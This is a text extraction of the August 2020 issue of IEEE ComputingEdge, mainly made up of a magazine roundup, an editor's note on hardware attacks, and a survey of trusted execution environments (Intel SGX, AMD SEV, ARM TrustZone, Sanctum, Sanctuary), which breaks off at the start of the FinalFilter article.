security and privacy automation blockchain digital...blockchain offers audit trails, i.e.,...

Security and Privacy

Automation Blockchain Digital Transformation

AUGUST 2020 www.computer.org

IEEE Computer Society Has You Covered!WORLD-CLASS CONFERENCES — Stay ahead of the curve by attending one of our 200+ globally recognized conferences.

DIGITAL LIBRARY — Easily access over 780k articles covering world-class peer-reviewed content in the IEEE Computer Society Digital Library.

CALLS FOR PAPERS — Discover opportunities to write and present your ground-breaking accomplishments.

EDUCATION — Strengthen your resume with the IEEE Computer Society Course Catalog and its range of offerings.

ADVANCE YOUR CAREER — Search the new positions posted in the IEEE Computer Society Jobs Board.

NETWORK — Make connections that count by participating in local Region, Section, and Chapter activities.

Explore all of the member benefi ts at www.computer.org today!

STAFF

EditorCathy Martin

Publications Operations Project SpecialistChristine Anthony

Production & Design ArtistCarmen Flores-Garvey

Publications Portfolio ManagersCarrie Clark, Kimberly Sperka

PublisherRobin Baldwin

Senior Advertising CoordinatorDebbie Sims

Circulation: ComputingEdge (ISSN 2469-7087) is published monthly by the IEEE Computer Society. IEEE Headquarters, Three Park Avenue, 17th Floor, New York, NY 10016-5997; IEEE Computer Society Publications Office, 10662 Los Vaqueros Circle, Los Alamitos, CA 90720; voice +1 714 821 8380; fax +1 714 821 4010; IEEE Computer Society Headquarters, 2001 L Street NW, Suite 700, Washington, DC 20036.Postmaster: Send address changes to ComputingEdge-IEEE Membership Processing Dept., 445 Hoes Lane, Piscataway, NJ 08855. Periodicals Postage Paid at New York, New York, and at additional mailing offices. Printed in USA.Editorial: Unless otherwise stated, bylined articles, as well as product and service descriptions, reflect the author’s or firm’s opinion. Inclusion in ComputingEdge does not necessarily constitute endorsement by the IEEE or the Computer Society. All submissions are subject to editing for style, clarity, and space.Reuse Rights and Reprint Permissions: Educational or personal use of this material is permitted without fee, provided such use: 1) is not made for profit; 2) includes this notice and a full citation to the original work on the first page of the copy; and 3) does not imply IEEE endorsement of any third-party products or services. Authors and their companies are permitted to post the accepted version of IEEE-copyrighted material on their own Web servers without permission, provided that the IEEE copyright notice and a full citation to the original work appear on the first screen of the posted copy. An accepted manuscript is a version which has been revised by the author to incorporate review suggestions, but not the published version with copy-editing, proofreading, and formatting added by IEEE. For more information, please go to: http://www.ieee.org/publications_standards/publications /rights/paperversionpolicy.html. Permission to reprint/republish this material for commercial, advertising, or promotional purposes or for creating new collective works for resale or redistribution must be obtained from IEEE by writing to the IEEE Intellectual Property Rights Office, 445 Hoes Lane, Piscataway, NJ 08854-4141 or [email protected]. Copyright © 2020 IEEE. All rights reserved.Abstracting and Library Use: Abstracting is permitted with credit to the source. Libraries are permitted to photocopy for private use of patrons, provided the per-copy fee indicated in the code at the bottom of the first page is paid through the Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01923.Unsubscribe: If you no longer wish to receive this ComputingEdge mailing, please email IEEE Computer Society Customer Service at [email protected] and type “unsubscribe ComputingEdge” in your subject line.IEEE prohibits discrimination, harassment, and bullying. For more information, visit www.ieee.org/web/aboutus/whatis/policies/p9-26.html.

IEEE COMPUTER SOCIETY computer.org

IEEE Computer Society Magazine Editors in Chief

ComputerJeff Voas, NIST

Computing in Science & EngineeringLorena A. Barba (Interim), George Washington University

IEEE Annals of the History of ComputingGerardo Con Diaz, University of California, Davis

IEEE Computer Graphics and ApplicationsTorsten Möller, Universität Wien

IEEE Intelligent SystemsV.S. Subrahmanian, Dartmouth College

IEEE Internet ComputingGeorge Pallis, University of Cyprus

IEEE MicroLizy Kurian John, University of Texas at Austin

IEEE MultiMediaShu-Ching Chen, Florida International University

IEEE Pervasive ComputingMarc Langheinrich, Università della Svizzera italiana

IEEE Security & PrivacyDavid Nicol, University of Illinois at Urbana-Champaign

IEEE SoftwareIpek Ozkaya, Software Engineering Institute

IT ProfessionalIrena Bojanova, NIST

2469-7087/20 © 2020 IEEE Published by the IEEE Computer Society August 2020 1

AUGUST 2020 � VOLUME 6 � NUMBER 8

Memory Encryption Engine

A B

Memory

Enclave A

Operating System

App Enclave B

CPU SGX Micro Code

So�

war

eH

ardw

are

A B

Memory

Enclave A

Operating System

App Enclave B

CPU Sanctum PTW

So�

war

eH

ardw

are

Security Monitor

SM

Hypervisor

Secure Processor

A B

CPU

Memory

So�

war

eH

ardw

are

App

OperatingSystem

App App

OperatingSystem

App

VM A VM B

(a) (b) (c)ShockSurpriseor shockat the event

Mor

al &

com

pete

nce

Time

DenialDisbelief;looking forevidence thatit is’t true

FrustrationRecognitionthat thingsare different;sometimesangry

DepressionLow mood;lacking inenergy

ExperimentInitialengagementwith newsituation

DecisionLearning howto work in thenew situation;feeling morepositive

IntegrationChangesintegrated;a renewedindividual

8Trusted Execution

Environments: Properties,

Applications, and Challenges

36Blockchain

and Electronic Healthcare

Records

48To Transform to

Have Agility,Don’t Do a Capital

A, Capital T Agile Transformation

Security and Privacy

8 Trusted Execution Environments: Properties, Applications, and Challenges

PATRICK JAUERNIG, AHMAD-REZA SADEGHI, AND EMMANUEL STAPF

14 FinalFilter: Asserting Security Properties of a Processor at Runtime CYNTHIA STURTON, MATTHEW HICKS, SAMUEL T. KING, AND

JONATHAN M. SMITH

Automation

22 Cyberattack-Resilient Cyberphysical SystemsBARRY M. HOROWITZ

30 EDI with Blockchain as an Enabler for Extreme Automation

JINAN FIAIDHI, SABAH MOHAMMED, AND SAMI MOHAMMED

Blockchain

36 Blockchain and Electronic Healthcare RecordsNIR KSHETRI

42 Supply Chain Trust NIR KSHETRI AND JEFFREY VOAS

Digital Transformation

48 To Transform to Have Agility, Don’t Do a Capital A, Capital T Agile Transformation

JONATHAN SMART

54 Enterprise ArchitectureRICARDO PEREZ-CASTILLO, FRANCISCO RUIZ, MARIO PIATTINI, AND

CHRISTOF EBERT

Departments 4 Magazine Roundup

7 Editor’s Note: Hardware —The New Point of Attack66 Conference Calendar

Subscribe to ComputingEdge for free at www.computer.org/computingedge.

4 August 2020 Published by the IEEE Computer Society 2469-7087/20 © 2020 IEEE

Magazine Roundup

The IEEE Computer Society’s lineup of 12 peer-reviewed technical magazines covers cutting-edge topics rang-ing from software design and computer graphics to Internet computing and security, from scientific appli-

cations and machine intelligence to visualization and microchip design. Here are highlights from recent issues.

Physical Computing: A Key Element of Modern Computer Science Education

A recent growth area in com-puter science education is phys-ical computing, which involves combining software and hardware to build interactive physical sys-tems that sense and respond to the real world. This article from the April 2020 issue of Computer pro-vides an overview of physical com-puting and its value in the class-room, using the BBC micro:bit as an example.

An Interactive Exploration Tool for High-Dimensional Datasets: A Shock Physics Case Study

Validating simulations with exper-imental results is a vital compo-nent of modern materials science. Existing workflows require sub-stantial human intervention to interpret their results. The authors of this article from the March/April 2020 issue of Computing in Science & Engineering present a

statistical approach to identifying physically meaningful features. The authors construct a visual-ization system that allows users to interactively and intuitively explore their datasets.

The Font Wars, Part 2

In the early 1980s, letters raster-ized from outline fonts at low and medium resolutions had irregular shapes. The lower the resolutions, the greater the irregularities, and the more that typographers criti-cized the type quality. PostScript fonts, launched in 1985, regular-ized medium-resolution type with secret ingredients coyly called “hints” by Adobe. This prompted competing inventions of font reg-ularization using techniques vari-ously called “instructions,” “delta exceptions,” “procedures,” “intel-ligence,” and other terms sound-ing more like high-tech snake oil than science. Further research and open publication, how-ever, revealed their connections to traditional aesthetics of let-ter symmetry as well as to mod-ern signal processing, pattern recognition, and psychophysics,

thus expanding our understand-ing of typography in digital cul-ture. Read more in this article from the January–March 2020 issue of IEEE Annals of the History of Computing.

Nano for the Public: An Exploranation Perspective

Public understanding of contem-porary scientific issues is criti-cal for the future of society. Public spaces, such as science centers, can affect the communication of science by providing active knowl-edge-building experiences of sci-entific phenomena. Contributing to this vision, the authors of this article from the March/April 2020 issue of IEEE Computer Graph-ics and Applications previously developed an interactive visualiza-tion as part of a public exhibition about nano. The authors reflect on how the immersive design and fea-tures of the exhibit contribute as a tool for science communication in light of the emerging paradigm of exploranation, and offer some for-ward-looking perspectives about what this notion has to offer the domain.

www.computer.org/computingedge 5

Decision Making in IoT Environment through Unsupervised Learning

Nowadays, unsupervised learning can identify hidden patterns and classes inside the huge amount of data coming from the Internet of Things (IoT). Analyzing IoT data through machine-learning tech-niques requires the use of mathe-matical algorithms, computational techniques, and an accurate tun-ing of the input parameters. In this article from the January/February 2020 issue of IEEE Intelligent Sys-tems, the authors present a study of unsupervised-learning tech-niques applied on IoT data to sup-port decision-making processes inside intelligent environments. To assess the proposed approach, they discuss two case studies in which behavioral IoT data has been collected, in a noninvasive way, to achieve an unsupervised classifi-cation that can be adopted during a decision-making process.

Network Quality-Aware Architecture for Adaptive Video Streaming From Drones

Video streaming over the IP net-works presents several chal-lenges for remote drone piloting.

To achieve a high Quality of Expe-rience, minimal latency is manda-tory. However, wireless links usu-ally impose dynamic changes to the Quality of Service conditions. Moreover, bandwidth limitations can increase both the final per-ceived latency and packet loss during video streaming. These cir-cumstances require an architec-ture capable of estimating net-work performance and applying corrective actions in a timely man-ner to optimize application-level quality. In this article from the Jan-uary/February 2020 issue of IEEE Internet Computing, the authors present such an architecture and discuss the results of its applica-tion in video streaming for remote drone piloting. Their proposal offers a framework with low cou-pling between its functional blocks and high adaptability to dynamic scenarios. Accordingly, they aim to pave the way for reactive applica-tions that leverage edge-comput-ing elements and adapt to network conditions.

MLPerf: An Industry Standard Benchmark Suite for Machine Learning Performance

In this article from the March/April 2020 issue of IEEE Micro, the authors describe the design choices behind MLPerf, a

machine-learning performance benchmark that has become an industry standard. The first two rounds of the MLPerf Training benchmark helped drive improve-ments to software-stack perfor-mance and scalability, showing a 1.3× speedup in the top 16-chip results despite higher quality tar-gets and a 5.5× increase in sys-tem scale. The first round of MLP-erf Inference received over 500 benchmark results from 14 differ-ent organizations, showing grow-ing adoption.

Do I Smell Coffee? The Tale of a 360° Mulsemedia Experience

One of the main challenges in cur-rent multimedia networking envi-ronments is to find solutions to help accommodate the next generation of mobile application classes with stringent Quality of Service (QoS) requirements while enabling the Quality of Experience (QoE) provi-sioning for users. One such appli-cation class is 360° mulsemedia—multiple sensorial media—which enriches 360° video by adding sen-sory effects that stimulate human senses beyond those of sight and hearing, such as the tactile and olfactory ones. In this article from the January–March 2020 issue of IEEE MultiMedia, the authors pres-ent a conceptual framework for

6 ComputingEdge August 2020

MAGAZINE ROUNDUP

360° mulsemedia delivery and a 360° mulsemedia-based prototype that enables users to experience 360° mulsemedia content. User evaluations revealed that higher video resolutions do not necessar-ily lead to the highest QoE levels. Therefore, bandwidth savings can be leveraged with no detrimental impact on QoE.

Child-Robot Theater: Engaging Elementary Students in Informal STEAM Education Using Robots

One of the options to make sci-ence, technology, engineering, and mathematics (STEM) more acces-sible, especially for children, is to integrate STEM content into more attractive materials and familiar formats. The authors of this arti-cle from the January–March 2020 issue of IEEE Pervasive Comput-ing created an afterschool pro-gram called “Child-Robot Theater” for children in a rural elementary school. They administered two pro-grams over two years. Thirty-seven children participated in the two-phase program, from which 23 chil-dren were included in the analysis of this study. The authors infused science, robotics, and computer science with acting, dancing, sing-ing, and drawing inspired by the theater production. In the article, after briefly introducing their peda-gogical framework and procedure, the authors delineate potential impacts, lessons, and recommen-dations for future works.

You Could Be Mine(d): The Rise of Cryptojacking

Traditional malicious attacks have evolved beyond file-based meth-ods, with malicious files now exist-ing as processes and services to evade detection. This article from the March/April 2020 issue of IEEE Security & Privacy examines the rise of cryptojacking—the use of another’s machine for profit through cryptocurrency mining—and how we’re all at risk.

Contrasting Big Bang With Continuous Integration Through Defect Reports

Continuous integration prom-ises earlier defect detection, qual-ity improvements, and more cus-tomer value delivered faster. In this case study from the May/June 2020 issue of IEEE Software, the authors examine development of software for the advanced safety and driver support component of a Swedish vehicle manufacturer in two consecutive projects.

Attacking Key Management in Ransomware

Ransomware has observed a steady growth over the years with several concerning trends that indicate efficient, targeted attacks against organizations and indi-viduals alike. These opportunistic

attackers indiscriminately tar-get both public- and private-sec-tor entities to maximize gain. In this article from the March/April 2020 issue of IT Professional, the authors highlight the criticality of key management in ransomware’s cryptosystem to facilitate build-ing effective solutions against this threat. They introduce the ran-somware kill chain to elucidate the path that adversaries must take to attain their malicious objec-tive. The authors examine current solutions presented against ran-somware in light of this kill chain and specify which constraints on ransomware are being violated by the existing solutions. Finally, they present the notion of mem-ory attacks against ransomware’s key management and present ini-tial experiments with dynamically extracting decryption keys from real-world ransomware. Results of the preliminary research are prom-ising, and the extracted keys were successfully deployed in subse-quent data decryption.

Join the IEEE Computer Societycomputer.org/join

2469-7087/20 © 2020 IEEE Published by the IEEE Computer Society August 2020 7

Editor’s Note

Hardware—The New Point of Attack

Cybercriminals increasingly exploit computer hardware

vulnerabilities, highlighting the need for secure architectures and hardware-based defenses. Cache timing, Rowhammer, BIOS, and other types of cyberattacks on hardware and firmware are threatening information security in new ways. This issue of Com-putingEdge discusses innovative techniques for combatting these attacks at the hardware level.

One promising approach is trusted execution environments (TEEs). IEEE Security & Priva-cy’s “Trusted Execution Environ-ments: Properties, Applications, and Challenges” provides an over-view of existing TEEs and calls for improvements in TEE architec-ture design. Meanwhile—given the absence of provably secure microprocessors—the authors of IEEE Micro’s “FinalFilter: Asserting Security Properties of a Processor

at Runtime” recommend using a dynamic, reconfigurable verifica-tion tool to catch security viola-tions not found using static verifi-cation methods.

Security is of paramount importance in today’s automated systems. The author of IEEE Secu-rity & Privacy’s “Cyberattack-Resilient Cyberphysical Systems” describes his team’s security approach for automated systems in cars, drones, and 3D printers. In IT Professional ’s “EDI with Block-chain as an Enabler for Extreme Automation,” the authors argue that blockchain technology can make electronic data interchange (EDI) systems—which automate healthcare supply-chain man-agement—more secure.

Blockchain technology can enable data security in various industries. Computer’s “Block-chain and Electronic Health-care Records” gives another

example of blockchain in health-care, explaining that the technol-ogy can help secure patient data. IT Professional ’s “Supply Chain Trust” shows how blockchain can help strengthen supply chains, which are increasingly subject to cyberattacks.

Finally, this ComputingEdgeissue features two articles from IEEE Software that examine dig-ital transformation. In “To Trans-form to Have Agility, Don’t Do a Capital A, Capital T Agile Trans-formation,” the author shares advice for digitally transform-ing large, established organi-zations: articulate reasons for change, focus on outcomes, pri-oritize technical excellence, and more. “Enterprise Architecture” presents insights about a digi-tal transformation process that allows companies to assess their IT systems and identify needed changes.


EDITORS: Mohamed Kaâniche, [email protected] Richard Kuhn, [email protected]

DEPARTMENT: RESILIENT SECURITY

Trusted Execution Environments: Properties, Applications, and ChallengesPatrick Jauernig, Ahmad-Reza Sadeghi, Emmanuel Stapf, TU Darmstadt

Software attacks on modern computer sys-tems have been a persisting challenge for several decades, leading to a continuous arms

race between attacks and defenses. As a first line of defense, operating system kernels enforce process isolation to limit potential attacks to only the code containing the vulnerabilities. However, vulnerabili-ties in the kernel itself (for example, various vulner-abilities found by Google Project Zero), side-channel attacks,1 or even physical attacks2 can be used to undermine process isolation.

To provide strong isolation between untrusted software components, including the operating sys-tems itself, a number of hardware-assisted security solutions have been proposed that aim to significantly increase the protection level that defenses against software exploitation have failed to provide. Promi-nent examples are trusted platform modules (TPMs), hardware security modules (HSMs), secure elements (SEs), and trusted execution environments (TEEs).

TPMs are dedicated, secure cryptoprocessors tied to the individual device, offering services like key generation, encryption, or authenticated integrity measurements called attestation. Yet, they do not offer isolation for sensitive applications. In contrast, HSMs also allow the running of sensitive code and are not bound to a device because they are typically implemented as plug-in cards (like peripheral com-ponent interconnect cards) or attachable external devices. SEs instead implement the HSM functional-ity as a coprocessor directly on the board, which offers only low performance due to size and energy

constraints. Moreover, third-party development on SEs is heavily restricted by manufacturers. An alterna-tive to these solutions is TEEs, which are commonly integrated tightly into the system on chip (SoC) and leverage existing SoC resources, enabling them to provide cryptographic primitives and isolated execu-tion with much higher flexibility than that provided by any other solution. Thus, industry is pushing TEEs on all fronts, from cloud servers and desktop computers over smartphones to low-energy embedded devices.

However, after years of hardware security re search, we can conclude that existing solutions are still insufficient: Deployed hardware solutions like TPMs or TEEs, are not used widely or have been attacked through various side-channels or through recently emerging cross-layer attacks that exploit hardware vulnerabilities from software, as demon-strated by attacks like CLKScrew or Foreshadow. The Hack@DAC hardware security contest3 revealed a systematic protection gap in current chip designs: Existing verification approaches may fail to detect certain classes of vulnerabilities in the Register Trans-fer Level (RTL) of hardware description code.

A promising recent approach is to manage hard-ware via a small software trusted computer base (TCB) to create strongly isolated unprivileged TEEs, (e.g., by building user-space enclaves for mobile devices based on ARM TrustZone4), or to leverage a completely open source design (for example, for the RISC-V platform5).

In this article, we review selected existing indus-trial and promising academic TEE solutions and briefly discuss the impact of deployed solutions, their strengths and shortcomings, and new research direc-tions. The results of this survey are summarized in Table 1.

This article originally appeared in

vol. 18, no. 2, 2020

Digital Object Identifier 10.1109/MSEC.2019.2947124 Date of current version: 19 March 2020


RESILIENT SECURITY

TEES PROPOSED BY INDUSTRYThe high demand for hardware-assisted security architectures led to the development of TEE architec-tures across many platforms. In this section, we pres-ent a subset of these TEE architectures of major pro-cessor brands, namely, Intel, AMD, and ARM.

Intel SGX: Protecting Apps in User SpaceIntel introduced Software Guard Extensions (SGX)6 with their Skylake microarchitecture in 2015. From the adversary model perspective, any software, including the OS, (and even some hardware components) may be considered untrusted. Hence, SGX’s TCB only com-prises the CPU hardware and its microcode.

In SGX, instances of a TEE, called enclaves [as shown in Figure 1(a)], are used to execute sensitive program code in user space, isolated from a poten-tially malicious OS or hypervisor. Each enclave is bundled with a regular nonsensitive application (App) that invokes the enclave as a child process. During the enclave setup, the integrity of the enclave code is veri-fied (attested); i.e., an authenticated measurement, typically a binary hash, of the code loaded into the enclave is reported either locally or remotely. When an enclave is executed, it shares its virtual address space with its host process. The enclave memory management is entirely performed by the untrusted OS. Moreover, the OS provides exception handling and input–output services to the enclave. Hardware

Intel SGX AMD SEV ARM TrustZone Sanctum Sanctuary

Commercial/academic Commercial Commercial Commercial Academic Academic

Target devices Client PCs Servers Mobile devices Undefined Mobile devices

Trust anchor CPU hardwareand microcode

Platformsecurityprocessor

TZ hardware andARM trustedfirmware

CPU hardwareand securitymonitor

TZ hardware and ARMtrusted firmware

Cache side-channelprotection

No No No Yes Yes (for sanctuaryinstances)

Multiple securitydomains

Yes Yes No Yes Yes

Secure peripherals No No Yes No Yes

TABLE 1. A comparison of presented TEE architectures.

Memory Encryption Engine

A B

Memory

Enclave A

Operating System

App Enclave B

CPU SGX Micro Code

So�

war

eH

ardw

are

A B

Memory

Enclave A

Operating System

App Enclave B

CPU Sanctum PTW

So�

war

eH

ardw

are

Security Monitor

SM

Hypervisor

Secure Processor

A B

CPU

Memory

So�

war

eH

ardw

are

App

OperatingSystem

App App

OperatingSystem

App

VM A VM B

(a) (b) (c)

FIGURE 1. High-level architectural views. The (a) Intel SGX, (b) Sanctum, and (c) AMD SEV. PTW: page table walker; VM: virtual machine.


RESILIENT SECURITY

features protect the enclave code and data (e.g., its page tables) from an unauthorized access by the host process, the OS, or even the hypervisor.

SGX is implemented inside the CPU through micro-code and minimal hardware changes that are made at the page table walker (PTW). All enclave code or data leaving the CPU is encrypted, using a new hardware component called the Memory Encryption Engine (MEE) that allows SGX to protect enclaves from direct memory access (DMA) attacks from malicious periph-erals. The MEE is also used to persistently store the enclave states after their execution.

In the first and only commercially available version of SGX, software cache side-channel attacks are not considered in the adversary model. However, a broad spectrum of recent attacks showed that side-channel attacks are a much more crucial threat for SGX than expected.1,7

AMD SEV: Moving to the CloudIn 2017, AMD introduced its own TEE, Secure Encrypted Virtualization (SEV)8 [shown in Figure 1(c)], which fol-lows an entirely different approach than Intel SGX. Whereas SGX focuses on micro services (e.g., DRM, or cryptographic functionality), AMD designed a TEE for the cloud: It offers better performance for inten-sive workloads and is transparent to the software run-ning in an SEV-enabled virtual machine (VM)8. Thus, its adversary model is also centered around the cloud (i.e., after setting up a VM, its memory is isolated even from the hypervisor).

To isolate a VM, Secure Encrypted Virtualization (SEV) encrypts each VM transparently with an indi-vidually generated encryption key. Access to these keys is limited to hardware; thus, the hypervisor or any other software component outside the VM cannot interfere with the encryption. Although SGX enclaves’ isolation is enforced by the memory management unit, SEV leverages Secure Memory Encryption (SME) to encrypt VM memory to protect against physical adversaries and to protect against privileged software or other VMs. SME is a transparent hardware memory encryption feature that encrypts data before storing it in memory and decrypts the data before loading it to the cache. SME stores encryption keys in a dedicated platform security processor based on the ARM archi-tecture, and only allows operations on memory that

has the matching tag to a key. This tag is automatically assigned to all memory that belongs to a VM (using the VM ASID identifier); thus, external accesses (for example, by the hypervisor) will see only encrypted data. A bit flag set indicates that a page should be encrypted; hence, VMs can also have unencrypted pages for shared memory.

Later, SEV-ES (Encrypted State) is introduced to add protection for CPU register contents which pre-vents information leakage to the hypervisor when a VM is suspended. As in SGX, cache side-channels are not considered in the adversary model of AMD SEV. Recently, security researchers from Google found a vulnerability in SEV’s elliptic-curve implementation, allowing them to recover the private key that is used to derive individual VM keys, effectively breaking the encryption. This issue has been fixed by a firmware update.9

ARM TrustZone: Protecting Mobile DevicesProtection of sensitive program code on mobile devices is also of vital importance and will be even more vital due to emerging use cases like mobile ID or the digital car key. Since 2004, ARM TrustZone10 has provided the hardware primitives to implement TEE security architectures on mobile devices. In Figure 2(a), the typical design of a security architecture that uses TrustZone is shown.

TrustZone assumes a strong software attacker able to compromise the untrusted commodity operat-ing system running regular apps. However, physical attackers are out of scope. TrustZone separates the system into two worlds: the normal world, containing the untrusted commodity OS and all nonsensitive applications, and the so-called secure world. The secure world comprises the sensitive applications [Trusted Apps (TAs)] and the Trusted OS (TOS). TAs can come either standalone or bundled with a nonsensitive application running in normal world, whereas the TOS provides usual process isolation and system services to the TAs. The secure world represents the single TEE of the system, unlike Intel SGX or AMD SEV, which can all provide multiple separated TEE instances. By including device drivers into the TOS, TrustZone can establish secure communication channels from peripherals (e.g., fingerprint sensors) to sensitive


RESILIENT SECURITY

applications. TrustZone even allows secure DMA by temporarily assigning memory regions exclusively to one or multiple SoC components (for example, the CPU, GPU, or LCD controller).

TrustZone’s core idea, the world switch, is imple-mented in the most privileged software component, called Trusted Firmware (TF), which also handles the communication between both worlds. The TF repre-sents the software TCB of the system together with all code running in the secure world. The separation between the normal and the secure world is achieved in hardware by a set of security enhancements of the CPU, the system bus, and additional components on the SoC such as the memory controller.

TrustZone does not provide cache partitioning and, therefore, cannot protect against cache side-channel attacks in general. Yet, the main weakness of clas-sic TrustZone-based security architectures is their single-TEE nature. As a result, trust relationships have to be established between the device vendor and every developer. Establishing this trust generates high costs for security assessments and management overhead, which restrains development of new secure mobile services.

TEES PROPOSED BY ACADEMIALimitations of existing TEEs motivated academic developers to propose their own hardware-assisted security architectures. In this section, we pres-ent Sanctum and Sanctuary which, on an abstract level, aim to improve Intel SGX and ARM TrustZone, respectively.

SANCTUM: EXTENDING ENCLAVE PROTECTION

The Sanctum security architecture was proposed in 2016 by Costan et al.4 for the open RISC-V architec-ture [shown in Figure 1(b)]. Sanctum resembles Intel SGX regarding its adversary model and high-level con-cept of user-space enclaves (or TEE instances) but pro-vides resilience to cache side-channel attacks. Like SGX, a Sanctum enclave comes bundled with a non-sensitive host application that invokes the enclave. The untrusted OS still provides exception handling and input–output services to the enclaves. However, in Sanctum, each enclave manages its own page tables.

In contrast to SGX, the enclave setup and other security critical functionalities are not implemented in microcode but in a software component called the Security Monitor (SM), which represents the software TCB of the system. The SM runs in the most privileged software level of a RISC-V processor, known as the machine level, and enables the enclave integrity verification locally or remotely before the enclave is executed. Sanctum enforces the isolation of the enclave code and data by introducing small hard-ware changes at the PTW of the CPU. The hardware changes guarantee on one hand that the OS cannot access enclave memory and, on the other hand, that an enclave cannot access the OS memory by chang-ing its page tables. The circuitry added around the PTW prevents a successful address translation of virtual memory addresses that would map to physical memory addresses that the current execution context is not allowed to access. The protection from cache

App

OperatingSystem

Bus and Memory Controller

Normal Secure Normal

Normal World

App

Trusted Firmware

Secure World

CPU Cores

TA

Trusted OS

TA

Memory

So�

war

eH

ardw

are

So�

war

eH

ardw

are

App

OperatingSystem

Bus and Memory Controller

Normal Secure Normal

Normal World

App

Trusted Firmware

Secure World

CPU Core s

SecurityPrimitives

Memory

SanctuaryLibrary

Sensitive App

Single Core

Sanctuary

Sanctuary

(a) (b)

FIGURE 2. High-level architectural views. (a) The ARM TrustZone and (b) the Sanctuary.


RESILIENT SECURITY

side-channel attacks is achieved with cache partition-ing, which is implemented through memory page col-oring. Cache partitioning allows assignment of cache lines of the last-level cache, which is shared between cores, exclusively to single enclaves.

In contrast to SGX, Sanctum does not encrypt the enclave code and data in the main memory. However, Sanctum provides a basic DMA attack protection by making small changes to the memory controller that allow Sanctum to restrict DMA to a certain region of the memory.

SANCTUARY: PROVIDING MULTIDOMAIN SECURITY

The limitations of TrustZone inspired the TEE archi-tecture Sanctuary, which was proposed by Brasser et al. in 2019.3 In contrast to currently deployed TrustZone-based security architectures, Sanctuary, which is shown in Figure 2(b), provides an arbitrary number of TEEs (or enclaves) on ARM-based devices. Moreover, Sanctuary tolerates malicious code in the TEEs, as well as cache side-channel attacks.

Sanctuary relies on TrustZone and, therefore, inherits many of its security features, such as world separation, secure boot, DMA access control, or secure communication to peripherals. In contrast to TrustZone, Sanctuary removes sensitive third-party applications from the secure world, which contains only security primitives provided by the device vendor. Instead, single sensitive apps are temporarily isolated on physical cores in a Sanctuary Instance. The remain-ing CPU cores execute the normal world and secure world code. Thus, no trust relationship has to be estab-lished between the device vendor and the sensitive app developer, which enables an open use of TrustZone. The isolated sensitive apps can communicate with the untrusted OS in the normal world and with the security primitives in the secure world. The communication is facilitated by a software component, called Sanctuary Library (SL), which provides OS services to the SA. The TF and secure world code represent the software TCB of the system. However, in Sanctuary, no third-party code is included in the TCB. The SL, which is also pro-vided by the device vendor, is not part of the system TCB because it is running in the normal world.

The isolation of the physical CPU cores is enforced using a security feature of the TrustZone-enabled

memory controller provided by ARM. In Sanctuary, this feature is exploited to temporarily assign memory regions exclusively to physical CPU cores when they are selected to execute a sensitive app. The configura-tion of the memory controller, as well as the setup of the enclaves, is performed and verified by the security primitives in the secure world.

Sanctuary cannot provide hardware cache par-titioning. However, software cache side-channel attacks on sensitive apps are prevented by flushing the core-exclusive caches when setting up an enclave and by excluding its code and data from the shared last-level cache.

One of the biggest challenges of existing TEE architectures is the threat of microarchitectural

attacks. The most prominent attacks in recent years were cache side-channel attacks (see Brasser et al.1) and transient execution attacks like Spectre and Melt-down.7 Most known microarchitectural attacks involve resources that are shared on the system and responsible for optimizing the performance of the system (for exam-ple, the data caches1 or the Branch Target Buffer).7

A modern TEE architecture must provide strong isolation among different security domains. However, preventing the sharing of resources might lead to a drastic decrease in system performance, which would make a TEE architecture impractical. At the same time, increasing the number of resources and partitioning them between the security domains might lead to a high hardware overhead. Therefore, designers of TEE architectures need to find a valuable tradeoff between domain isolation and resource sharing.

Moreover, designers must keep in mind that the known microarchitectural attacks might not be the end of the story. Cross-layer attacks based on hard-ware bugs can be diverse, as shown at the hardware security contests Hack@DAC in 2018 and 2019.3

REFERENCES1. F. Brasser, U. Muller, A. Dmitrienko, K. Kostiainen, S.

Capkun, and A. Sadeghi, “Software Grand Exposure: SGX cache attacks are practical,” in Proc. 11th USENIX Workshop Offensive Technologies, Vancouver, British Columbia, 2017. [Online]. Available: https://www .usenix.org/conference/woot17/workshop-program /presentation/brasser


RESILIENT SECURITY

2. “Fault attacks on secure chips: From glitch to flash,” in Proc. Design and Security of Cryptographic Algorithms and Devices (ECRYPT II), Albena, Bulgaria, May 29–June 3, 2011. [Online]. Available: https://studylib.net/doc /18400951/fault-attacks-on-secure-chips–from-glitch -to-flash

3. G. Dessouky, et al., “Hardfails: Insights into software- exploitable hardware bugs,” in Proc. 28th USENIX Secu-rity Symp., Santa Clara, CA, 2019. [Online]. Available: https://www.usenix.org/conference/usenixsecurity19 /presentation/dessouky

4. F. Brasser, D. Gens, P. Jauernig, A. Sadeghi, and E. Stapf, “Sanctuary: Arming TrustZone with user-space enclaves,” in Network and Distributed System Security Symp., San Diego, CA, 2019. doi: 10.14722/ndss.2019.23448.

5. V. Costan, I. A. Lebedev, and S. Devadas, “Sanctum: Minimal hardware extensions for strong software isolation,” in Proc. 25th USENIX Security Symp., Austin, TX, 2016, pp. 213–230.

6. Intel. “Intel® Software Guard Extensions programming reference,” 2014. Accessed on: Aug. 9, 2019. [Online]. Available: https://software.intel.com/sites/default /files/managed/48/88/329298-002.pdf

7. C. Canella, J. V. et al., “A systematic evaluation of

transient execution attacks and defenses,” in Proc. 28th USENIX Security Symp., Santa Clara, CA, 2019, pp. 249–266.

8. S. Mofrad, F. Zhang, S. Lu, and W. Shi, “A comparison study of Intel SGX and AMD Memory Encryption technology,” in Proc. 7th Int. Workshop Hardware and Architectural Support Security and Privacy, New York, 2018.

9. Seclists.org, CVE-2019-9836, Accessed on: Aug. 8, 2019. [Online]. Available: https://seclists.org/fulldisclosure /2019/Jun/46, 2019.

10. ARM Limited. “Security technology: Building a secure system using TrustZone® technology,” 2008. [Online]. Available: http://infocenter.arm.com/help/index .jsp?topic=/com.arm.doc.prd29-genc-009492c/index .html

PATRICK JAUERNIG is a researcher with TU Darmstadt. Con-tact him at [email protected].

AHMAD-REZA SADEGHI is a professor with TU Darmstadt. Contact him at [email protected].

EMMANUEL STAPF is a researcher with TU Darmstadt. Con-tact him at [email protected].

Write for the IEEE Computer Society’s authoritative computing publications and conferences.

IEEE COMPUTER SOCIETY

Call for Papers

GET PUBLISHEDwww.computer.org/cfp


DEPARTMENT: EXPERT OPINION

FinalFilter: Asserting Security Properties of a Processor at RuntimeCynthia Sturton, University of North Carolina at Chapel Hill

Matthew Hicks, Virginia Tech

Samuel T. King, University of California, Davis

Jonathan M. Smith, University of Pennsylvania and DARPA

In an ideal world, it would be possible to build a provably correct and secure processor. However, the complexity of today's processors puts this

